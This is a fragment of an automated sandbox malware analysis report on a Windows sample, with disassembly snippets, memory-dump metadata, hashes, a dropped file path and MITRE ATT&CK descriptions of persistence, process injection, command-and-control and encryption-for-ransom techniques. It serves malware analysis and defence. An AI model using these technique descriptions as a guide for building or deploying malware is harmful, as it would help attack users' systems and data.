lstrcmpiA.KERNEL32(0FE65444,mask,0FE65445,?,?,0FE63441,0FE65445,00000000,00000000,00000000,?,?,0FE65444,00000000), ref: 0FE631B9
lstrcmpiA.KERNEL32(0FE65444,pub_key,?,0FE63441,0FE65445,00000000,00000000,00000000,?,?,0FE65444,00000000), ref: 0FE631D1

Strings

pub_key, xrefs: 0FE631BF
mask, xrefs: 0FE631B1

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: mask$pub_key
API String ID: 1586166983-1355590148
Opcode ID: e0ec87d878966c9243feaecf38d55011b47d371f66cd9aab4e2b1ae61f3b91ed
Instruction ID: 020a9e7ebc59535b4422ea7e277c8c8dc714b4ed0c14464fcb64da73d2290d21
Opcode Fuzzy Hash: e0ec87d878966c9243feaecf38d55011b47d371f66cd9aab4e2b1ae61f3b91ed
Instruction Fuzzy Hash: FAF0467238828C1EE7154A68AC457E2BBCD9B41394F84207FE68AC2242D2AA98818350

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report wThN5MTIsw.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Network Port Distribution

UDP Packets

Windows Analysis Report
wThN5MTIsw.exe

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre